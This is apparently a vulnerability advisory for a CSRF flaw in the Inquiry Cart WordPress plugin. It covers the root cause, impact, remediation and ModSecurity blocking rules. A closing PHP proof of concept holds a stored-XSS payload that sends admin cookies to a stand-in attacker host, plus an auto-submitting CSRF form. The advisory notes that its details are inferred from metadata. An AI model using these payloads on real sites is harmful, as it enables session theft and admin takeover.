Atomic Edge analysis of CVE-2026-4090 (metadata-based):
This is a Cross-Site Request Forgery (CSRF) vulnerability in the Inquiry Cart plugin for WordPress, affecting all versions up to and including 3.4.2. The vulnerability exists in the rd_ic_settings_page function, which handles settings form submissions without proper nonce verification. An unauthenticated attacker can trick a logged-in administrator into performing an unwanted action, leading to modification of plugin settings and potential stored cross-site scripting (XSS) in the admin area. The CVSS score is 6.1 (Medium), with the vector indicating network-based, low-complexity, unauthenticated privilege required, user interaction required, and a scope change.
The root cause is the absence of nonce validation in the rd_ic_settings_page function. In WordPress, settings forms should include a nonce field (created by wp_nonce_field) and the processing function should verify it with check_admin_referer or wp_verify_nonce. Based on the CWE classification (352) and the description, Atomic Edge analysis infers that the function processes $_POST data directly without calling check_admin_referer(‘plugin-settings-action’) or similar. This is a confirmed CSRF pattern; no code diff is available but the description explicitly states “missing nonce verification.”
Exploitation requires an attacker to craft a malicious HTML page or link that submits a forged POST request to the WordPress admin area. The target endpoint is likely /wp-admin/options-general.php?page=rd_ic_settings or similar admin page for the Inquiry Cart plugin. The attacker can set plugin options such as enabling/disabling features, but more critically, can inject malicious JavaScript into fields that are later displayed in the admin interface (stored XSS). The CSRF bypass allows the attacker to bypass the intended administrator authorization check because the request appears to come from an authenticated session. The attack vector requires social engineering: the attacker must convince an administrator to click a link or visit a page while logged into WordPress.
Remediation requires the plugin developer to add nonce verification to the rd_ic_settings_page function. The fix should use check_admin_referer(‘rd_ic_settings’) or wp_verify_nonce($_POST[‘_wpnonce’], ‘rd_ic_settings’) before processing any $_POST data. Additionally, output should be escaped with esc_html or wp_kses to prevent stored XSS. Since no patched version is available, sites using this plugin should consider disabling it or implementing a virtual patch via a Web Application Firewall (WAF) to block requests to the vulnerable endpoint without a valid nonce.
The impact includes unauthorized modification of plugin settings, which may break site functionality or introduce security weaknesses. More critically, the ability to inject malicious scripts (stored XSS) into the admin area allows an attacker to execute arbitrary JavaScript in the context of any administrator who visits the settings page. This can lead to session hijacking, credential theft, or further privilege escalation by creating new administrator users or installing malicious plugins. The stored XSS is persistent, meaning every subsequent admin user who accesses the settings page will be affected.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
SecRule REQUEST_URI "@contains /wp-admin/options-general.php" "id:20264090,phase:2,deny,status:403,chain,msg:'CVE-2026-4090 - Inquiry Cart CSRF - Missing nonce in settings form',severity:'CRITICAL',tag:'CVE-2026-4090'"
SecRule ARGS:page "@streq inquiry-cart-settings" "chain"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule ARGS_POST:_wpnonce "@eq 0" "t:none,deny,status:403,msg:'CVE-2026-4090 - Inquiry Cart CSRF - Missing nonce in settings form',severity:'CRITICAL',tag:'CVE-2026-4090'"
SecRule REQUEST_URI "@contains /wp-admin/options-general.php" "id:20264091,phase:2,deny,status:403,chain,msg:'CVE-2026-4090 - Inquiry Cart CSRF - No nonce provided',severity:'CRITICAL',tag:'CVE-2026-4090'"
SecRule ARGS:page "@streq inquiry-cart-settings" "chain"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule &ARGS_POST:_wpnonce "@eq 0" "t:none,deny,status:403,msg:'CVE-2026-4090 - Inquiry Cart CSRF - No nonce provided',severity:'CRITICAL',tag:'CVE-2026-4090'"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4090 - Inquiry cart <= 3.4.2 - Cross-Site Request Forgery via Settings Form
// This proof-of-concept demonstrates how an attacker can forge a request to update
// plugin settings and inject a stored XSS payload in the admin area.
// Assumptions:
// - The vulnerable endpoint is /wp-admin/options-general.php?page=inquiry-cart-settings
// (derived from plugin slug 'inquiry-cart' and typical WordPress settings page pattern).
// - The form processes POST parameters like 'rd_ic_custom_css' or similar settings fields.
// - No nonce check is performed before updating options.
$target_url = 'http://example.com/wp-admin/options-general.php?page=inquiry-cart-settings';
// Stored XSS payload: injects a script that steals admin cookies or creates admin user
$payload = '<script>new Image().src="http://attacker.com/steal?c="+document.cookie;</script>';
$post_data = array(
'rd_ic_custom_css' => $payload, // This field is displayed in admin without escaping
'rd_ic_other_setting' => '1',
'option_page' => 'inquiry-cart-settings',
'action' => 'update',
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_hash=valid_admin_session;'); // Requires admin session
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// The attacker would typically host an HTML page that auto-submits this form
// via JavaScript or a simple <form> with action pointing to the target.
// The following demonstrates the direct HTTP request (requires admin cookie).
$response = curl_exec($ch);
if (curl_errno($ch)) {
echo 'cURL error: ' . curl_error($ch) . PHP_EOL;
} else {
echo 'Request sent. Check if settings were updated.' . PHP_EOL;
}
curl_close($ch);
// Alternative: CSRF form that an admin would be tricked into submitting
// (This is more realistic because the attacker does not have the admin cookie)
echo '--- CSRF Form (host this on attacker site) ---' . PHP_EOL;
echo '<html><body>' . PHP_EOL;
echo '<form action="' . $target_url . '" method="POST">' . PHP_EOL;
echo '<input type="hidden" name="rd_ic_custom_css" value="' . htmlspecialchars($payload, ENT_QUOTES) . '">' . PHP_EOL;
echo '<input type="hidden" name="option_page" value="inquiry-cart-settings">' . PHP_EOL;
echo '<input type="hidden" name="action" value="update">' . PHP_EOL;
echo '<input type="submit" value="Click me">' . PHP_EOL;
echo '</form>' . PHP_EOL;
echo '<script>document.forms[0].submit();</script>' . PHP_EOL;
echo '</body></html>' . PHP_EOL;
